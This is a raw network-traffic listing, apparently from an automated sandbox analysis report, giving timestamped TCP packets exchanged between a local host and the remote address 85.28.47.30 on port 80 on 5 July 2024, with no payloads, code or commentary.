                                                                Jul 5, 2024 04:36:05.999214888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999244928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999270916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999361038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999381065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999392986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999407053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999409914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999429941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999439955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999500990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999514103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999525070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999537945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999543905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999552011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999571085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999598026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999644041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999656916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999669075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999681950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999689102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999697924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999701023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999710083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999722958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999732018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999751091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999775887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.999964952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.999977112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000011921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000122070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000133991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000144958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000155926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000168085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000168085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000180960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000193119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000196934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000205040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000216007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000225067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000242949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000260115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000284910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000298977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000308990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000322104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000329018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000339985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000351906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000358105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000381947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000402927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000586987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000598907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000608921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000621080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000632048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000633001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000648975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000662088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000663042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.000677109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.000705004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088138103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088164091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088175058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088196993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088215113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088238955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088248968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088258982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088268995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088279009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088279009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088295937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088324070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088463068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088505983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088535070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088545084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088555098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088567972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088578939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088577032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088599920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088615894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088680983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088725090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088754892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088767052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088799953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088809967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088824034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088833094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088845015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088855982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088860035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088876009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088885069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088896036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088902950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088923931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088924885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088934898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088946104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088948965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088963985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088963985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.088990927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.088992119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089004993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089006901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089014053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089035034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089049101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089059114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089061975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089072943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089081049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089107037 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089113951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089131117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089132071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089143038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089153051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089164972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089165926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089173079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089191914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089212894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089215040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089224100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089235067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089261055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089282036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089289904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089332104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089335918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089344025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089369059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089381933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089411020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089421988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089432001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089446068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089456081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089468956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089473963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089481115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089492083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089502096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089518070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089534044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089559078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089569092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089577913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089611053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089632988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089647055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089657068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089668036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089685917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089694977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089724064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089735031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089745045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089754105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089764118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089772940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089790106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089801073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089808941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089819908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089859009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.089956045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089967012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089976072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089987040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.089998007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090006113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090009928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090018988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090022087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090029001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090040922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090059042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090061903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090069056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090084076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090087891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090099096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090106010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090131998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090166092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090177059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090187073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090197086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090209007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090212107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090226889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090239048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090251923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090251923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090267897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090279102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090280056 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090303898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090312004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090379953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090389967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090399027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090409040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090420961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090429068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090447903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090460062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090534925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090549946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090565920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090575933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090585947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090586901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090603113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090607882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090612888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090624094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090634108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090634108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090646029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090662003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090666056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090686083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090692997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090707064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090734959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090801954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090814114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090822935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090832949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090843916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090850115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090853930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090863943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090874910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090888023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090902090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090918064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090931892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090943098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090951920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.090964079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.090998888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.179924965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.179935932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.179943085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.179960012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.179965019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180016041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180021048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180027008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180037022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180053949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180068970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180088043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180263042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180320978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180330038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180342913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180382013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180402994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180412054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180447102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180468082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180479050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180490017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180497885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180542946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180558920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180574894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180583000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180593967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180608988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180613041 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180619955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180620909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180632114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180644989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180651903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180655003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180672884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180681944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180686951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180712938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180713892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180727005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180727959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180766106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180773973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180792093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180800915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180808067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180818081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180845022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180845022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180859089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180866957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180872917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180887938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180896044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180917978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180939913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.180978060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180988073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.180995941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181009054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181025982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181047916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181054115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181063890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181068897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181077003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181099892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181104898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181116104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181123972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181126118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181138992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181149006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181162119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181185007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.181215048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181231022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181241035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181252003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.181268930 CEST4973080192.168.2.485.28.47.30
